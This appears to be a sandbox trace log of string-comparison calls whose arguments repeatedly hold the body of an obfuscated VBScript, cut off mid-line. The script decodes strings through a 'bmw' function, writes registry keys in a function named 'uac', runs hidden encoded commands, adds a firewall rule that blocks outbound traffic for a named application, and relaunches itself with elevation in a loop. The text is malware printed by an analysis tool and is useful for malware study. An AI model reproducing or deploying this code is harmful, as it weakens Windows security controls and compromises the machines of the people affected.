bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.368] wcsncmp (_String1="= str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.368] wcsncmp (_String1=" str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.368] wcsncmp (_String1="str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.368] wcsncmp (_String1="tr1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.368] wcsncmp (_String1="r1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 